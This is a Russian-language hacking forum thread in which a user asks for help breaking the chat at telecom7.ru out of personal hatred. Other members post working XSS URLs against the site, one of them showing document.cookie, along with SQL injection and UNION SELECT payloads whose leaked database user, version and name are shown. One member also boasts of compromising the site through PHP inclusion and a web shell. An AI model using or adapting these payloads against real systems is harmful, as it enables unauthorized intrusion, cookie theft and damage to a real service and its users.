Помогите пожалуста.сломать чат telecom7.ru

Discussion in 'Песочница' started by vnuki, 20 Oct 2006.

  1. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Помогите пожалуста.сломать чат http://www.telecom7.ru/Chat/

    Обращаюсь за помощью к вам.ко всем,очень мне нужна помощь ваша.пока я только начинаю постигать искуство хакеров,и очень усердно.если кто то может то прошу помощи.надо срончо сломать чат http://www.telecom7.ru/Chat/ или кто нибудь раскажите как можно измыватся над этим чатом,какие там есть глюки чтоб напрмер как нить выкидывать пользователей и др..что там можно зделать так чтоб только пошло на вред этому чату.Я думаю я не буду выкладывать свою причину ненавсити к этому чату.спасибо заранее. :)
     
    #1 vnuki, 20 Oct 2006
    Last edited: 20 Oct 2006
  2. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    чат больно похож на такие, которые алгол описывал в своей статье, http://www.antichat.ru/crackchat/index.html у меня щаз времени нету, прочти статейку, мож чё выйдет
     
    1 person likes this.
  3. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    вот xss:
    http://www.telecom7.ru/Chat/board.php?ss=">[xss]
     
  4. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Спасибо большое что подсказал.а что xss делает ч захожу по этой ссылке.и просто доска сообщений чата.Можеш пожалуста обьяснить.??
     
  5. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    неа .я мож не так хорошо понимаю что там написано но делал как там сказано и нечего не вышло. к сожалению..жду помощи от других просто ну очень надо.
     
  6. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    вот полная XSS: http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>

    а тут написано что с ней делать
    http://forum.antichat.ru/thread20140.html
     
    1 person likes this.
  7. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    вот еще посерьезней уязвимость.- sql инжекшн.
    как я понмаю, это самописный чат какой-то. никогда раньше таких не видел...

    http://www.telecom7.ru/Chat/Img.php?id=211578'

    вот еще xss

    http://www.telecom7.ru/Chat/info.php?i=</title><script>alert(1)</script>
     
    #7 Dagon, 20 Oct 2006
    Last edited: 20 Oct 2006
  8. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Да самописный чат.Это точно.
     
  9. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    я захожу но мне пишет что
    SQL ERROR in line 3, function mysql_query это как понять?
     
  10. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    to kaban ты дал мне эту ссылкук http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>
    я её вставил и ты дал ещё одну ссылку чтоб почитать но я так толкьом не понял к чему она.если тебе не трудно то обьясни...пожалуста.
     
  11. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    ...

    Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
     
  12. vnuki

    vnuki Banned

    Joined:
    20 Oct 2006
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    у тебя есть icq ? дай пожалуста я тебе стукну.и ты мне если не трудно обьясни по понятнее.
     
  13. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Вариант со сукулью не пройдёт не отобразит из за ошибки
    http://www.telecom7.ru/Chat/Img.php?id=-211578+union+select+null,user(),null/*
     
    _________________________
  14. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    2 Nova
    а если просмотреть исходный код изображения то получем
    USER() [email protected]
    VERSION() 4.0.15a
    DATABASE() telecom7
     
    _________________________
  15. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Мдя а я незаметил =)
     
    _________________________
  16. JOKER_KILL

    JOKER_KILL New Member

    Joined:
    19 Apr 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    -6
    Ну так что, его возможно взломать или нет? Что то так никто и не даёт точного ответа! Я слышал что его можно ломануть через сниффер но у меня что то не получилось! Чат его не принимает!
     
  17. Зубчег

    Зубчег Elder - Старейшина

    Joined:
    10 Dec 2006
    Messages:
    26
    Likes Received:
    17
    Reputations:
    0
    Joker_kill

    Что за бред ты несеш? Прочитай посты, а мы о чём говорим?

    И с чего ты сделал вывод, что тут хакеров нету? Если ты слепой это твои проблемы...


    ЗАПОМНИ

    Всё что создано человеком, можно сломать.
     
    1 person likes this.
  18. [GeW]

    [GeW] Member

    Joined:
    18 Apr 2007
    Messages:
    19
    Likes Received:
    9
    Reputations:
    5
    Помнится в конце прошлого лета, я его поломал при помощи php-инклудинга. Затем через веб-шелл в eval() накатал скрипт, для смены пароля для определённого пользователя, но из-за ошибки в этом скрипте у всех пользователей пароль сменился на "p4ssw0rd". Админ 3 дня откат БД делал, а вину всю на своего прова свалил). Потом вроде эту багу прикрыли...
     
  19. Neorin

    Neorin Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    48
    Likes Received:
    15
    Reputations:
    0
    http://www.telecom7.ru/Chat/board.php?ss="><script>alert(document.cookie)</script>
    покруи вызови вторую ошибку и всё будет круть))))